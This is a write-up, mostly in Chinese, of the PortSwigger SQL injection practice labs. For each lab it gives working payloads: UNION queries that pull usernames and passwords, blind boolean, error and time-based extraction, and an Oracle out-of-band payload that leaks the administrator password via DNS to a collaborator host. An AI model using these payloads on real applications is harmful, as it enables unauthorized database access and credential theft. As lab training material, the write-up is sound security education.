SQL INJECTION
Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
1 | '+OR+1=1-- |
Lab: SQL injection vulnerability allowing login bypass
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the
administratoruser.
1 | username=administrator'-- |
Lab: SQL injection UNION attack, determining the number of columns returned by the query
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.
order by 查列数,或者 union,select 查列数(这题想过必须用union,select)
1 | filter?category=Corporate+gifts' order by 3-- |
Lab: SQL injection UNION attack, finding a column containing text
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
就是想找到哪个列能够容纳字符串数据,方便我们下一步带出数据库的内容,替换空值一列一列试就行,不是字符串型的就会报错,试到第二列就找到了。
1 | Gifts' union select null,'xWslwe',null -- |
Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called
users, with columns calledusernameandpassword. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the
administratoruser.
题目告诉我们了,有个表 users,和列名 username,password。然后让我们获取管理员账号密码,依旧 order by 看取了几列,然后 测试哪个列能带出字符串
1 | Gifts' union select username,password from users-- |
Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called
users, with columns calledusernameandpassword. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the
administratoruser.
只有一个列可以容纳字符串,可以通过将值连接在一起来检索此单列中的多个值,可以查这个表
https://portswigger.net/web-security/sql-injection/cheat-sheet
| Oracle | 'foo'||'bar' |
| ———- | ———————————————————— |
| Microsoft | 'foo'+'bar' |
| PostgreSQL | 'foo'||'bar' |
| MySQL | 'foo' 'bar' [Note the space between the two strings] CONCAT('foo','bar') |
1 | Gifts' union select null,username||'~'||password from users-- |
Lab: Blind SQL injection with conditional responses
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a
Welcome backmessage in the page if the query returns any rows. The database contains a different table called
users, with columns calledusernameandpassword. You need to exploit the blind SQL injection vulnerability to find out the password of theadministratoruser. To solve the lab, log in as the
administratoruser.
burpsuite 抓包, 修改 TrackingIdcookie,将其更改为:
1 | TrackingId=qvo4LQBOsQ69LE2x' AND '1'='1 |
验证 Welcome back消息出现在响应中。现在将其更改为:
1 | TrackingId=qvo4LQBOsQ69LE2x' AND '1'='2 |
验证 Welcome back消息未出现在响应中。这演示了如何测试单个布尔条件并推断结果。
1 | TrackingId=qvo4LQBOsQ69LE2x' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's |
也可以先爆破长度
Lab: Blind SQL injection with conditional errors
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called
users, with columns calledusernameandpassword. You need to exploit the blind SQL injection vulnerability to find out the password of theadministratoruser. To solve the lab, log in as the
administratoruser.
这一题条件盲注实效了,不管真或假都返回一样的,那我们就可以尝试条件错误漏洞,题目提示我们是 oracle 数据库,我们可以对着这个表查询一下。
https://portswigger.net/web-security/sql-injection/cheat-sheet
1 | BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN 1=0 THEN to_char(1/0) ELSE 'a' END FROM dual)='a |
这里 to_char(1/0) 为什么不直接 1/0 来触发除0报错呢,因为 在 Oracle 中,CASE 表达式的所有可能返回路径必须具有相同的数据类型:也就是说 then 返回的数据类型和 else 返回的要一致,不然等不到触发除0报错就开始报错了
爆破长度为 20
1 | BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN length(password)=1 THEN to_char(1/0) ELSE 'a' END from users where username='administrator')='a |
然后设置集束炸弹爆破20个位置的每一个字符了
1 | BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN SUBSTR(password,1,1)='t' THEN to_char(1/0) ELSE 'a' END from users where username='administrator')='a |
Lab: Visible error-based SQL injection
This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
The database contains a different table called
users, with columns calledusernameandpassword. To solve the lab, find a way to leak the password for theadministratoruser, then log in to their account.
这题用的报错注入,加一个单引号直接爆出错误消息
1 | Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = '1WgE3VBZpDwz8Skn''. Expected char |
利用 cast 转换字符串为int会报错的特性,因为查询语句长度有限制,要用 limt 还要把 cookie 之前的值删了,因为有长度限制会截断
1 | 'or CAST((SELECT username from users limit 1) AS int)=1-- |
Lab: Blind SQL injection with time delays
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
延时注入
1 | TrackingId=x'||pg_sleep(10)-- |
|| 是连接符,和 ,mysql 不一样的是PostgreSQL不允许 OR pg_sleep(10),因为类型不匹配:不能将布尔值与 void 用 OR 连接
假如不用连接符用 or 表达式,
- 左边:
id = 'x'→ 布尔值(TRUE/FALSE) - 右边:
pg_sleep(10)→ 返回 void(无返回值)
Lab: Blind SQL injection with time delays and information retrieval
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
The database contains a different table called
users, with columns calledusernameandpassword. You need to exploit the blind SQL injection vulnerability to find out the password of theadministratoruser. To solve the lab, log in as the
administratoruser.
在上一题的基础上把账号密码爆破出来
1 | vSDNFCcNXur0Qevt' || (SELECT CASE WHEN (username='administrator' and length(password)=0) THEN pg_sleep(2) ELSE pg_sleep(0) END from users)-- |
Lab: Blind SQL injection with out-of-band interaction
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
这次网站是异步执行sql了,不能从时间上看出区别了,可以用 DNS 外带。
1 | H6B7TghULcLtqs5R' union select EXTRACTVALUE(xmltype('%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fcyej8oek4gwsfbrnhy397kzmmds4gw4l.oastify.com%2F%22%3E%20%25remote%3B%5D%3E')%2C'%2Fl')%20FROM%20dual -- |
Lab: Blind SQL injection with out-of-band data exfiltration
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
The database contains a different table called
users, with columns calledusernameandpassword. You need to exploit the blind SQL injection vulnerability to find out the password of theadministratoruser. To solve the lab, log in as the
administratoruser.
在上一题的基础上把信息带出来
1 | ' union select EXTRACTVALUE(xmltype('%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2F'%7C%7C(SELECT password from users where username='administrator')%7C%7C'.bl0ivn1jrfjr2aem4xq8ujml9cf43wrl.oastify.com%2F%22%3E%20%25remote%3B%5D%3E')%2C'%2Fl')%20FROM%20dual -- |
Lab: SQL injection with filter bypass via XML encoding
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a
userstable, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.
HEXHTML 编码绕过 waf 检测,学到了一个新插件,很好用 => Hackvertor
Lab: SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
在 Oracle 数据库上,每个 SELECT语句必须指定要选择的表 FROM. 如果你的 UNION SELECT攻击不从表中查询,你仍然需要包括 FROM关键字后跟有效的表名。
Oracle 中有一个内置表,称为 dual你可以用它来实现这个目的。例如: UNION SELECT 'abc' FROM dual
1 | ?category=Pets'union select null,null from dual -- |
Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
这道题数据库是 mysql 啊,一开始我用 –注释不起作用,才想起来 mysql 用 – 注释的话最后面要跟空格
1 | Accessories' UNION SELECT '1111', NULL --%20 |
或者用 #
1 | Accessories' UNION SELECT '1111', NULL %23 |
1 | Accessories' UNION SELECT @@version, NULL %23 |
Lab: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administratoruser.
1 | Pets'union select table_name,'1' from information_schema.tables-- |
Lab: SQL injection attack, listing the database contents on Oracle
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administratoruser.
1 | Lifestyle' union select table_name,'a' from all_tables-- |
本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。
